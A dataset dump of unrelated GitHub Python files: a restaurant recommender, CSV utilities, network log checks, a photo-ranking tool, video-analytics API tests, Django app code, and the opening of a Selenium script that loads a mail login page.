\n # Getting diet restrictions of the user\n user_restrictions_in = input('Please select the following diet restrictions '\n '(please separate by a comma if selecting multiple):'\n ' \\n 1. Vegan \\n 2. Vegetarian \\n 3. Gluten-free \\n'\n ' 4. lactose intolerant \\n 5. No restrictions\\n')\n\n # Since there is a possibility of having multiple restrictions, split into list\n user_selected_restrictions = user_restrictions_in.split(',')\n\n # Turning list of strings into list of integers\n for entry in range(len(user_selected_restrictions)):\n user_selected_restrictions[entry] = int(user_selected_restrictions[entry])\n\n # Getting user input for dietary restrictions\n diet = []\n if 1 in user_selected_restrictions:\n diet.append('vegan')\n if 2 in user_selected_restrictions:\n diet.append('vegetarian')\n if 3 in user_selected_restrictions:\n diet.append('gluten')\n if 4 in user_selected_restrictions:\n diet.append('lactose')\n \n # Getting user preference for dining options\n user_dine_option = input('Please select a dining option. If multiple separate by a comma: \\n 1. Dine-in \\n 2. Take-out\\n 3. Delivery\\n')\n dine_in_list = user_dine_option.split(',')\n\n final_list = []\n if '1' in dine_in_list:\n final_list.append('dine-in')\n if '2' in dine_in_list:\n final_list.append('take-out')\n if '3' in dine_in_list:\n final_list.append('delivery')\n \n\n # Getting user preference for distance\n user_distance_option = int(input('Please select a distance from Queens campus:'\n ' \\n 1. Under 10 minutes \\n 2. Between 10 and 20 minutes \\n 3. Over 20 minutes\\n'))\n\n if user_distance_option == 1:\n distance = 'under 10'\n elif user_distance_option == 2:\n distance = '10 to 20'\n else:\n distance = 'over 20'\n\n\n # Creating customer class to store information in an object for easier access\n user = customer(price, diet, final_list, distance)\n \n # Need to iterate through the list and find which restaurants match with the users preference\n # using the example theory function. Use T.solve to find the solution to the users preferences and then match with\n # restaurants that match up\n\n # T = example_theory(user)\n \n # List to display results \n finalListR = []\n\n # Loops through each restaurant in the csv file\n for entry in restaurant_list:\n \n # Variable for example theory method\n T = example_theory(entry, user)\n \n \"\"\" Checks if the theory is satisfiable for each restaurant.\n this is where we determine if the restaurant is a good fit \n or not\"\"\"\n\n y = example_theory(entry,user).is_satisfiable()\n \n # if the theory is satified\n if y == True:\n finalListR.insert(0, entry.name)\n else:\n finalListR.insert(len(finalListR), entry.name)\n\n # to display all the results of restaurants best fit to worst fit\n for i in range(len(finalListR)):\n if i < 4:\n print(f\"{i + 1}. %s\" % finalListR[i] + ' ' + '★ ★ ★ ★ ★')\n elif i >= 4 and i < 7:\n print(f\"{i + 1}. %s\" % finalListR[i] + ' ' + '★ ★ ★ ★')\n elif i <= 7 and i < 11: \n print(f\"{i + 1}. %s\" % finalListR[i] + ' ' + '★ ★ ★')\n elif i <= 11 and i < 15: \n print(f\"{i + 1}. %s\" % finalListR[i] + ' ' + '★ ★')\n else: \n print(f\"{i + 1}. %s\" % finalListR[i] + ' ' + '★')","repo_name":"nicholasfalconi/Restaurant-modeling-project","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":18007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"15843239490","text":"import asyncio\r\nimport time\r\nimport csv\r\n\r\nasync def readfile(filename):\r\n res = []\r\n csv_reader = csv.reader(open(filename, \"r\"), delimiter=',')\r\n for row in csv_reader:\r\n res.append(row)\r\n return res\r\n\r\nasync def writefile(lst):\r\n writer = csv.writer(open('combine.csv', mode='w',newline=\"\"), delimiter=\",\")\r\n for i in lst:\r\n writer.writerow(i)\r\n \r\nasync def main():\r\n print(f\"start at {time.strftime('%X')}\")\r\n task1 = asyncio.create_task(readfile(\"AMZN_2006-01-01_to_2018-01-01.csv\"))\r\n task2 = asyncio.create_task(readfile(\"IBM_2006-01-01_to_2018-01-01.csv\"))\r\n lst1 = await task1\r\n lst2 = await task2\r\n lst2.pop(0)\r\n await writefile(lst1+lst2)\r\n print(f\"finish at {time.strftime('%X')}\")\r\n\r\nasyncio.run(main())\r\n","repo_name":"sheropen/Learning-Data-Science-with-Python","sub_path":"1900094810-尤俊浩-assignment-05/co-combine.py","file_name":"co-combine.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"19148776137","text":"\"\"\"Common verification functions for log\"\"\"\n\n# Python\nimport re\nimport logging\nimport operator\n\n# Genie\nfrom genie.utils.timeout import Timeout\nfrom genie.metaparser.util.exceptions import SchemaEmptyParserError\n\nlog = logging.getLogger(__name__)\n\ndef is_logging_ospf_spf_logged(device, expected_spf_delay=None, ospf_trace_log=None,\n max_time=60, check_interval=10):\n \"\"\"\n Verify SPF change log\n\n Args:\n device('obj'): device to use\n expected_spf_delay('int'): SPF change value \n ospf_trace_log('str') : OSPF trace log\n max_time ('int'): Maximum time to keep checking\n check_interval ('int'): How often to check\n\n Returns: \n Boolean \n Raises:\n N/A \n \"\"\"\n timeout = Timeout(max_time, check_interval)\n\n # show commands: \"show log {ospf_trace_log}\"\n while timeout.iterate():\n try:\n output = device.parse('show log {ospf_trace_log}'.format(\n ospf_trace_log=ospf_trace_log))\n except SchemaEmptyParserError:\n timeout.sleep()\n continue\n\n file_content_list = output['file-content']\n\n # log message:\n # Jun 12 03:32:19.068983 OSPF SPF scheduled for topology default in 8s\n p = (\n '.*OSPF SPF scheduled for topology default in (?P\\d+)s'\n )\n\n for i in file_content_list:\n m = re.match(p, i)\n if m:\n if int(m.groupdict()['spf_change']) == expected_spf_delay:\n return True\n\n timeout.sleep()\n return False \n\ndef verify_log_exists(device, file_name, expected_log,\n max_time=60, check_interval=10, invert=False,\n match=None):\n \"\"\"\n Verify log exists\n\n Args:\n device('obj'): device to use \n file_name('str') : File name to check log\n expected_log ('str'): Expected log message\n max_time ('int'): Maximum time to keep checking\n check_interval ('int'): How often to check\n invert ('bool', 'optional'): Inverts to check if it doesn't exist\n\n Returns: \n Boolean \n Raises:\n N/A \n \"\"\"\n op = operator.truth\n if invert:\n op = lambda val : operator.not_(operator.truth(val))\n\n timeout = Timeout(max_time, check_interval)\n\n # show commands: \"show log {file_name}\"\n while timeout.iterate():\n try:\n if match:\n cmd = 'show log {file_name} | match \"{match}\"'.format(\n file_name=file_name,\n match=match)\n output = device.execute(cmd)\n log_output = device.parse(cmd, output=output)\n else:\n log_output = device.parse('show log {file_name}'.format(\n file_name=file_name))\n except SchemaEmptyParserError:\n timeout.sleep()\n continue\n\n log_found = log_output.q.contains(\n '.*{}.*'.format(expected_log), regex=True)\n \n if op(log_found):\n return True\n\n timeout.sleep()\n return False \n\n\ndef verify_no_log_output(device, file_name,max_time=60, \n check_interval=10, invert=False, match=None):\n \"\"\"\n Verify no log exists\n\n Args:\n device('obj'): device to use \n file_name('str') : File name to check log\n max_time ('int'): Maximum time to keep checking\n check_interval ('int'): How often to check\n invert ('bool', 'optional'): Inverts to check if it doesn't exist\n match ('str', 'optional'): used in show log command to specify output\n\n Returns: \n Boolean \n Raises:\n N/A \n \"\"\"\n\n timeout = Timeout(max_time, check_interval)\n while timeout.iterate():\n try:\n if match:\n cmd = 'show log {file_name} | match \"{match}\"'.format(\n file_name=file_name,\n match=match)\n output = device.execute(cmd)\n log_output = device.parse(cmd, output=output)\n else:\n log_output = device.parse('show log {file_name}'.format(\n file_name=file_name))\n except SchemaEmptyParserError:\n return True\n \n if not log_output:\n return True\n\n timeout.sleep()\n continue\n\n return False","repo_name":"Preet2fun/Ansible-server-network-automation","sub_path":"network-test-virtualenv/lib/python3.6/site-packages/genie/libs/sdk/apis/junos/log/verify.py","file_name":"verify.py","file_ext":"py","file_size_in_byte":4430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"21735049740","text":"# Define dfs\r\ndef dfs(target, root, visited=[], count=0):\r\n visited.append(root)\r\n for node in target[root]:\r\n if node not in visited:\r\n count += 1\r\n visited, count = dfs(target, node, visited, count)\r\n return visited, count\r\n\r\n\r\n# 1. Input data\r\nnode_size = int(input())\r\nT = int(input())\r\n\r\ngraph = {}\r\nfor i in range(T):\r\n v1, v2 = map(int, input().split())\r\n\r\n if v1 in graph:\r\n graph[v1].append(v2)\r\n else:\r\n graph[v1] = [v2]\r\n if v2 in graph:\r\n graph[v2].append(v1)\r\n else:\r\n graph[v2] = [v1]\r\n\r\n# 2. Process dfs\r\nif graph[v1]:\r\n print(dfs(graph, 1)[1])\r\nelse:\r\n print(0)\r\n","repo_name":"DonghwooCho/problem-solving","sub_path":"백준/Silver/2606. 바이러스/바이러스.py","file_name":"바이러스.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"40420427183","text":"import cv2, os, math, random\nfrom collections import deque\nimport argparse\n\nTARGET_PIXEL_AREA = 260000.0\n\n\n# TODO need to get new size based on bigger of the two\ndef combine_pics(impath1, impath2):\n img1 = cv2.imread(impath1)\n img2 = cv2.imread(impath2)\n switched = False\n\n if img1.shape[0] * img1.shape[1] < img2.shape[0] * img2.shape[1]:\n temp = img1\n img1 = img2\n img2 = temp\n switched = True\n\n ratio1 = float(img1.shape[1]) / float(img1.shape[0])\n new_h = int(math.sqrt(TARGET_PIXEL_AREA / ratio1) + 0.5)\n new_w1 = int((new_h * ratio1) + 0.5)\n\n ratio2 = float(img2.shape[1]) / float(img2.shape[0])\n new_w2 = int((new_h * ratio2) + 0.5)\n\n return switched, cv2.hconcat([cv2.resize(img1, (new_w1, new_h)), cv2.resize(img2, (new_w2, new_h))])\n\n\ndef is_first_better(combined, impath1, impath2, is_switched):\n winName = impath1 + \" ||| \" + impath2 if not is_switched else impath2 + \" ||| \" + impath1\n cv2.namedWindow(winName)\n cv2.moveWindow(winName, 0, 150)\n cv2.imshow(winName, combined)\n while True:\n key = cv2.waitKeyEx(0)\n if key in [ord('a'), ord('s'), ord('d'), ord('f')]:\n cv2.destroyAllWindows()\n return True\n elif key in [ord('j'), ord('k'), ord('l'), ord(';')]:\n cv2.destroyAllWindows()\n return False\n else:\n cv2.destroyAllWindows()\n break\n\n\ndef get_full_list(parent):\n lst = []\n for root, dirs, files in os.walk(parent):\n for file in files:\n if not (file == '.DS_Store' or file.startswith('Icon') or file == '.dropbox' or file.startswith('blogpic')\n or file.endswith('.m4v') or file.endswith('.MOV') or file.endswith('mov') or file.endswith('.txt')):\n lst.append(os.path.join(root, file))\n with open('full_pic_list.txt', 'w') as f:\n f.write('\\n'.join(lst))\n return lst\n\n\ndef get_txt_list(path):\n with open(path, 'r') as fi:\n lst = fi.readlines()\n random.shuffle(lst)\n return lst\n\ndef print_ends():\n with open('full_pic_list.txt', 'r') as f:\n lst = f.readlines()\n ends = list(map(lambda x: x[-4:], lst))\n end_set = set(ends)\n print(end_set)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('in_dir', help='within Camera Uploads')\n args = parser.parse_args()\n\n parent = '/Users/waltmart/Dropbox (Personal)/Camera Uploads/' + args.in_dir + '/'\n pic_list = get_full_list(parent)\n rand_pic_list = pic_list.copy()\n random.shuffle(rand_pic_list)\n q = deque(rand_pic_list)\n\n # for n in [2500, 2000, 1500, 1000, 500, 200, 100, 50, 20, 10]:\n # for n in [1500, 1000, 500, 200, 100, 50, 20, 10]:\n for n in [1000, 500, 200, 100, 50, 20, 10, 5]:\n # for n in [100, 50, 20, 10, 5, 2, 1]:\n while len(q) > n:\n pic1 = q.popleft()\n pic2 = q.popleft()\n switched, combined = combine_pics(pic1, pic2)\n if is_first_better(combined, pic1[len(parent):], pic2[len(parent):], switched):\n q.append(pic1) if not switched else q.append(pic2)\n else:\n q.append(pic2) if not switched else q.append(pic1)\n\n if not os.path.exists(parent + 'lists/'):\n os.makedirs(parent + 'lists/')\n\n with open(parent + 'lists/' + str(n) + '.txt', 'w+') as f:\n f.write('\\n'.join(list(q)))\n","repo_name":"Xctrunner/pix_rating","sub_path":"bracket.py","file_name":"bracket.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"1146922230","text":"def csv_to_list1(csv_file): #to nie działa\n result = []\n with open('dane.csv', 'rt') as my_file:\n for line in my_file:\n linia = line.rstrip('\\r\\n')\n lista = linia.split(',')\n result.append(lista)\n return result\n\n\ndef csv_to_list(csv_file):\n return [line.rstrip('\\r\\n').split(',') for line in csv_file]\n\ndef csv_to_list2(csv_file):\n expected_len = None\n result = []\n\n for line in csv_file:\n record = line.rstrip('\\r\\n').split(',')\n if expected_len is None:\n expected_len = len(record)\n elif len(record) != expected_len:\n raise ValueError('Malformed CSV file')\n result.append(record)\n return result\n\n\ndef csv_to_list3(csv_file):\n result = [csv_file.readline().rstrip('\\r\\n').split(',')]\n for line in csv_file:\n record = line.rstrip('\\r\\n').split(',')\n if len(record) != len(result[0]):\n raise ValueError('Malformed CSV file.')\n result.append(record)\n return result\n\n\nif __name__ == '__main__':\n with open('dane.csv') as csv_file:\n print(csv_to_list1(csv_file))\n\n","repo_name":"DWLCPawelG/TESTER_SCHOOL","sub_path":"day3/csv_to_list.py","file_name":"csv_to_list.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"16629846685","text":"import time\nimport random\nfrom typing import Tuple\n\nfrom lib.client.zmqClient import ZmqClient\nfrom lib.client.soapClient import SoapClient\nfrom lib.log_and_statistic.statistic import Statistic\n\nfrom scripts.xml import zmq\nfrom scripts.common import graph, tools\nfrom scripts.tools import analytics\n\nfrom scripts.ws import users as ws_users\nfrom scripts.ws import common as ws_common\nfrom scripts.ws import ewriter as ws_ewriter\nfrom scripts.ws import faceva as ws_analytics\n\n\nclass TestAnalytics:\n \"\"\"Класс-обертка с тестами по аналитике\n\n \"\"\"\n def __init__(self, input_data: dict, config: dict, statistic: Statistic):\n self._statistic: Statistic = statistic\n self._logger = self._statistic.get_log().get_logger(\"test/test_Analytics\")\n\n self._input_data: dict = input_data\n self._config: dict = config\n\n self._server_ip: str = config['server']['ip']\n self._server_port: int = config['server']['ws_port']\n self._login: str = config['user']['login']\n self._password: str = config['user']['password']\n self._server_db_path: str = config['server']['db_path']\n\n def setup(self):\n \"\"\"Данный метод вызывается перед запуском каждого теста.\n\n \"\"\"\n pass\n\n def teardown(self):\n \"\"\"Данный метод вызывается по завершению каждого теста.\n\n \"\"\"\n pass\n\n def test_faceva_get_event(self):\n \"\"\"Тест проверяет ws метод FaceVA:GetEvent.\n Тест может работать в двух режимах: skd_mode = True - используются только ws методы лиц, то есть точно также,\n как и вызвает их СКД; skd_mode = False - за эталон берутся события системы и сравниваются с событиями от лиц,\n таким образом проверяются возможные пропуски.\n\n max_counts_event - кол-во событий для проверки, при достижении которых тест должен завершиться.\n event_getting_timeout - как часто запрашивать события, в случае если они не были найдены.\n\n \"\"\"\n ws_client = SoapClient(self._server_ip, self._server_port, self._config, self._statistic)\n token: str = ws_users.server_login(ws_client, self._login, self._password, self._statistic)\n current_time = ws_common.get_current_server_time(ws_client, token, self._statistic)\n\n events_count = 0\n last_event_time = current_time\n last_event_id = 0\n from_event = 0\n while True:\n if self._input_data['skd_mode']:\n events: Tuple[dict] = ws_analytics.faceva_get_event(ws_client, token, from_event, self._statistic)\n else:\n events: Tuple[dict] = ws_ewriter.select(ws_client, token, last_event_time, None, None, [20013], None,\n None, None, self._statistic)\n events: list = list(events)\n events.reverse()\n\n if not events or len(events) == 1 and events[0] == {}:\n time.sleep(self._input_data['event_getting_timeout'])\n continue\n events: tuple = tuple(events)\n self._statistic.append_info(\"Получены события\", \"ИНФО\")\n\n for index, event in enumerate(events):\n events_count += 1\n if self._input_data['skd_mode'] is False:\n # пропускаем старые (уже проверенные) события\n if event['evtid'] <= last_event_id:\n events_count -= 1\n continue\n\n faceva_events: Tuple[dict] = ws_analytics.faceva_get_event(ws_client, token, 0, self._statistic)\n index_faceva_event = tools.get_dict_by_keys_values(faceva_events, ('event', ), (event['evtid'], ))\n\n if index_faceva_event < 0:\n self._statistic.append_error(\"Нет события: \" + str(event['evtid']) + \"!\", \"КРИТ\", True)\n\n person_id = faceva_events[index_faceva_event]['person']\n persons = ws_analytics.faceva_get_data_base(ws_client, token, self._statistic)\n index_person = tools.get_dict_by_keys_values(persons, ('id', ), (person_id, ))\n\n if index_person < 0:\n self._statistic.append_error(\"В базе нет id: \" + str(person_id) + \"!\", \"КРИТ\", True)\n\n person_name = persons[index_person]['name']\n\n if event['evtcomment'].find(person_name) < 0:\n self._statistic.append_error(\"ФИО персоны не совпадают в событии \" + str(event['evtid']) + \"!\",\n \"НЕВАЛИД ЗНАЧ\", False)\n\n event_id = faceva_events[index_faceva_event]['event']\n time_ = faceva_events[index_faceva_event]['time']\n camera = faceva_events[index_faceva_event]['camera']\n\n event_time: str = event['evttime']\n date_event_time = tools.get_date_from_str(event_time)\n last_event_time = str(tools.convert_time_to_gtc(date_event_time))[:-3]\n last_event_id = event_id\n else:\n event_id = event['event']\n time_ = event['time']\n camera = event['camera']\n from_event = event_id\n\n # Проверка получения кадра по событию.\n # Выполнение ws метода FaceVA:GetFrame\n ws_result = ws_analytics.faceva_get_frame(ws_client, token, camera, time_, self._statistic)\n if tools.check_keys_exist(ws_result, ['img'], 'result[0]', False, self._statistic) is False:\n self._statistic.append_error(\"По событию \" + str(event_id) + \"!\", \"ОТСУТСТВУЕТ КАДР\", True)\n elif not ws_result['img']:\n self._statistic.append_error(\"По событию \" + str(event_id) + \"!\", \"ОТСУТСТВУЕТ КАДР\", True)\n else:\n self._statistic.append_success(\"По событию '\" + str(event_id) + \"'!\", \"ПОЛУЧЕН КАДР\")\n\n # Проверка получения картинки по событию.\n # Выполнение ws метода FaceVA:GetEventImage\n ws_result = ws_analytics.faceva_get_event_image(ws_client, token, event_id, time_, self._statistic)\n if tools.check_keys_exist(ws_result, ['img'], 'result[0]', False, self._statistic) is False:\n self._statistic.append_error(\"По событию \" + str(event_id) + \"!\", \"ОТСУТСТВУЕТ КАРТИНКА\", True)\n elif not ws_result['img']:\n self._statistic.append_error(\"По событию \" + str(event_id) + \"!\", \"ОТСУТСТВУЕТ КАРТИНКА\", True)\n else:\n self._statistic.append_success(\"По событию \" + str(event_id) + \"!\", \"ПОЛУЧЕНА КАРТИНКА\")\n\n if events_count >= self._input_data['max_count_events']:\n break\n if events_count >= self._input_data['max_count_events']:\n break\n\n def test_faceva_get_faces(self):\n \"\"\"Тест проверяет ws метод FaceVA:GetFaces.\n Тест может работать в двух режимах: skd_mode = True - используются только ws методы лиц, то есть точно также,\n как и вызвает их СКД; skd_mode = False - за эталон берутся события системы и сравниваются с событиями от лиц,\n таким образом проверяются возможные пропуски.\n\n max_counts_event - кол-во событий для проверки, при достижении которых тест должен завершиться.\n event_getting_timeout - как часто запрашивать события, в случае если они не были найдены.\n\n \"\"\"\n ws_client = SoapClient(self._server_ip, self._server_port, self._config, self._statistic)\n token: str = ws_users.server_login(ws_client, self._login, self._password, self._statistic)\n current_time = ws_common.get_current_server_time(ws_client, token, self._statistic)\n\n events_count = 0\n last_event_time = current_time\n last_event_id = 0\n from_event = 0\n while True:\n if events_count >= self._input_data['max_count_events']:\n break\n if self._input_data['skd_mode']:\n events: Tuple[dict] = ws_analytics.faceva_get_faces(ws_client, token, from_event, self._statistic)\n else:\n events: Tuple[dict] = ws_ewriter.select(ws_client, token, last_event_time, None, None, [20072],\n self._statistic)\n events: list = list(events)\n events.reverse()\n\n if not events or len(events) == 1 and events[0] == {}:\n time.sleep(self._input_data['event_getting_timeout'])\n continue\n\n self._statistic.append_info(\"Получены события\", \"ИНФО\")\n\n for index, event in enumerate(events):\n if events_count >= self._input_data['max_count_events']:\n break\n events_count += 1\n if self._input_data['skd_mode'] is False:\n if event['evtid'] <= last_event_id:\n events_count -= 1\n continue\n\n faceva_events: Tuple[dict] = ws_analytics.faceva_get_faces(ws_client, token, last_event_id,\n self._statistic)\n index_faceva_event = tools.get_dict_by_keys_values(faceva_events, ['event'], [event['evtid']])\n\n if index_faceva_event < 0:\n self._statistic.append_error(\"Нет события: '\" + str(event['evtid']) + \"'\", \"КРИТ\", True)\n\n event_id = faceva_events[index_faceva_event]['event']\n time_ = faceva_events[index_faceva_event]['time']\n camera = faceva_events[index_faceva_event]['camera']\n img = faceva_events[index_faceva_event]['img']\n\n event_time: str = event['evttime']\n date_event_time = tools.get_date_from_str(event_time, stat)\n last_event_time = str(tools.convert_time_to_gtc(date_event_time))[:-3]\n last_event_id = event_id\n else:\n event_id = event['event']\n time_ = event['time']\n camera = event['camera']\n img = event['img']\n from_event = event_id\n\n # Проверка получения кадра по событию.\n # Выполнение ws метода FaceVA:GetFrame\n ws_result = ws_analytics.faceva_get_frame(ws_client, token, camera, time_, self._statistic)\n if tools.check_keys_exist(ws_result, ['img'], 'result[0]', False, self._statistic) is False:\n self._statistic.append_error(\"По событию '\" + str(event_id) + \"'!\", \"ОТСУТСТВУЕТ_КАДР\", True)\n elif not ws_result['img']:\n self._statistic.append_error(\"По событию '\" + str(event_id) + \"'!\", \"ОТСУТСТВУЕТ_КАДР\", True)\n else:\n self._statistic.append_success(\"По событию '\" + str(event_id) + \"'!\", \"ПОЛУЧЕН_КАДР\")\n\n # Проверка получения картинки по событию.\n if not img:\n self._statistic.append_error(\"По событию '\" + str(event_id) + \"'!\", \"ОТСУТСТВУЕТ_КАРТИНКА\", True)\n else:\n self._statistic.append_success(\"По событию '\" + str(event_id) + \"'!\", \"ПОЛУЧЕНА_КАРТИНКА\")\n\n def test_faceva_update_person(self):\n \"\"\"Тест проверяет работу ws метода FaceVA:UpdatePerson.\n\n Тест добавляет с помощью этого ws метода персон из указанной директории, в которой находятся папки,\n имена которых являются ФИО персоны, а внутри каждой папки фотографии этой персоны. После каждого добавления\n вызывается метода FaceVA:GetDataBase с целью фактической проверки добавления человека.\n \"\"\"\n ws_client = SoapClient(self._server_ip, self._server_port, self._config, self._statistic)\n token = ws_users.server_login(ws_client, self._login, self._password, self._statistic)\n\n # получение текущего списка людей в БД\n old_persons_db = ws_analytics.faceva_get_data_base(ws_client, self._login, self._statistic)\n persons_dir = tools.get_dirs(self._input_data[\"persons_dir\"])\n\n for person in persons_dir:\n name: str = person\n category: str = str(random.randint(0, 100000))\n comment: str = random.choice([\"На больничном\", \"Удаленная работа\", \"Полная ставка\", \"Пол ставки\", \"Фрилансер\"])\n information: str = random.choice([\"Программист\", \"Тестировщик\", \"Директор\", \"Начальник отдела тестирования\",\n \"Менеджер по продажам\"])\n department: str = random.choice([\"Тестирования\", \"Разработки ПО\", \"Продаж\", \"Кадров\"])\n person_photos: Tuple[str] = tools.get_files(self._input_data[\"persons_dir\"] + \"/\" + person)\n photo_paths = []\n for person_photo in person_photos:\n photo_paths.append(self._input_data[\"persons_dir\"] + \"/\" + person + \"/\" + person_photo)\n photos_base64: Tuple[str] = tools.get_photos_base64(tuple(photo_paths))\n faces = []\n for photo_base64 in photos_base64:\n faces.append({\n \"img\": str(photo_base64)\n })\n while True:\n pacs_id: int = random.randint(0, 1000)\n if tools.get_dict_by_keys_values(old_persons_db, (\"pacs\", ), (pacs_id, )) == -1:\n break\n\n person_id = ws_analytics.faceva_update_person(ws_client, token, -1, pacs_id, name, category, comment,\n information, department, faces, [], self._statistic)\n current_persons_db = ws_analytics.faceva_get_data_base(ws_client, token, self._statistic)\n\n key_names = (\"id\", \"name\", \"pacs\", \"category\", \"comment\", \"information\", \"department\")\n key_values = (person_id, name, pacs_id, category, comment, information, department)\n if tools.get_dict_by_keys_values(current_persons_db, key_names, key_values) == -1:\n self._statistic.append_error(name, \"ПЕРСОНА НЕ ДОБАВЛЕНА\", True)\n\n self._statistic.append_success(name, \"ПЕРСОНА ДОБАВЛЕНА\")\n \"\"\"# запуск удаления\n for person_name in current_new_persons:\n # удаление из базы\n analytics.faceva_delete_person(client, self.login, self.password, person_name)\n # получение текущего списка людей в БД\n persons_db = analytics.faceva_get_data_base(client, self.login, self.password)\n # если после удаления человек в базе остался, то произошла ошибка удаления\n if tools.get_dict_by_keys_values(persons_db, [\"name\"], [person_name]) != -1:\n log.print_error(\"delete person '\" + person_name + \"' has done with error! It exists in data base\"\n \" after delete\")\n continue\n log.print_test(\"delete person '\" + person_name + \"' was executed successfully!\")\n # очистка списка новых людей, которые были удалены\n current_new_persons.clear() \"\"\"\n\n def test_analytic_events(self):\n \"\"\"Тест строит указанное кол-во графов устройство->микшер->ИВ54сервер->аналитика,\n затем ожидает конца дампа/ави и сравнивает фактичиские события с указанными в data\n \"\"\"\n analytic_block: dict = tools.open_json_file(self._input_data['json'], self._statistic)\n cam_json = graph.create_json_from_profiles(self._input_data['server'], analytic_block,\n self._input_data['video_source'], True, self._statistic)\n ws_client = SoapClient(self._server_ip, self._server_port, self._config, self._statistic)\n token: str = ws_users.server_login(ws_client, self._login, self._password, self._statistic)\n cam_name: str = graph.insert_graphs_to_db(ws_client, token, self._server_db_path, cam_json,\n self._input_data['server'], self._input_data['profile'], 1,\n self._statistic)[0]\n if self._input_data['detector'] == \"forget2\":\n event_type = 20074\n elif self._input_data['detector'] == \"FaceVA\":\n event_type = 20013\n else:\n self._statistic.append_error(self._input_data['detector'], \"НЕТ ДЕТЕКТОРА\", True)\n cam_info = {\n \"server\": self._input_data['server'],\n \"cam\": cam_name,\n \"profile\": self._input_data['profile']\n }\n analytics.run_events_test(ws_client, token, cam_info, self._input_data['events'],\n self._input_data['inaccuracy'], event_type, self._input_data['video_source'],\n self._statistic)\n\n def simple_kars(self):\n \"\"\"Тест проверяет работу модуля лиц по протоколу zmq.\n\n \"\"\"\n zmqclient = ZmqClient(self._config, self._statistic)\n zmqclient.start_handler_thread()\n timeout = 2.0\n # отправка hello\n message_id = zmq.send_hello(zmqclient, 1212, timeout, self._statistic)\n\n # отправка enroll_models\n model_data = zmq.send_enroll_models(zmqclient, self._input_data[\"path_to_photo\"], timeout, self._statistic)\n descriptor = model_data[0]\n model_id = model_data[1]\n\n # отправка AddModelToHotlist\n zmq.send_add_model_to_hot_list(zmqclient, model_id, descriptor, 1, 0, 1, timeout, self._statistic)\n\n # TODO логика ожидания\n while True:\n time.sleep(10)\n\n\n zmqclient.stop_handler_thread()\n","repo_name":"dmitriySSAU/TestRunner","sub_path":"tests/test_Analytics.py","file_name":"test_Analytics.py","file_ext":"py","file_size_in_byte":20090,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"28133365471","text":"from django.shortcuts import render, redirect\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.urls import reverse\nfrom django.http import HttpResponsePermanentRedirect, Http404\nfrom django.conf.urls import handler404\nfrom database.models import martabak as model_martabak\n\ndef index(request):\n return render(request, 'index.html')\n\ndef pages(request, page_requested, additional_page=\"\", last_pattern=\"\"):\n if last_pattern:\n handler404 = error_404\n if page_requested != 'menu':\n context = {\n 'page' : page_requested,\n }\n return render(request, 'pages.html', context)\n else:\n try:\n checkMartabak = model_martabak.objects.get(slug = additional_page)\n if checkMartabak:\n context = {\n 'page' : page_requested,\n 'martabak' : additional_page,\n }\n return render(request, 'detail.html', context)\n except ObjectDoesNotExist:\n return redirect(\"Menu\")\n\ndef menu(request):\n context = {\n 'page' : 'menu',\n }\n return render(request, 'pages.html', context)\n \ndef error_404(request, exception):\n return render(request, '404.html')\n\ndef error_500(request):\n return render(request, '404.html')","repo_name":"shamahdev/irmartabak-heroku","sub_path":"backend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"18508790079","text":"from rest_framework import serializers\n\nfrom posts.models import Post\n\n\ndef validate_title(value):\n query = Post.objects.filter(title__iexact=value)\n if query.exists():\n raise serializers.ValidationError(\"Post with title already exists\")\n return value\n","repo_name":"lordace-coder/blog_api","sub_path":"posts/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"30359162755","text":"# -*- coding: utf-8 -*-\n\n\nfrom django.db import models, migrations\nimport django.utils.timezone\nimport django_extensions.db.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='MailTemplate',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created', django_extensions.db.fields.CreationDateTimeField(default=django.utils.timezone.now, verbose_name='created', editable=False, blank=True)),\n ('modified', django_extensions.db.fields.ModificationDateTimeField(default=django.utils.timezone.now, verbose_name='modified', editable=False, blank=True)),\n ('title', models.CharField(max_length=100)),\n ('subject', models.CharField(default=b'VOKO Utrecht - ', max_length=100)),\n ('html_body', models.TextField()),\n ],\n options={\n 'ordering': (b'-modified', b'-created'),\n 'abstract': False,\n 'get_latest_by': b'modified',\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"VOKO-Utrecht/voko","sub_path":"webapp/mailing/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"18980417104","text":"from selenium import webdriver\nimport time\n\n\n\ndriver = webdriver.Chrome()\ndriver.get('https://exmail.qq.com/cgi-bin/loginpage')\n\ndef print_info():\n title = driver.title\n print(title)\n now_url = driver.current_url\n print(now_url)\n\nprint('Before 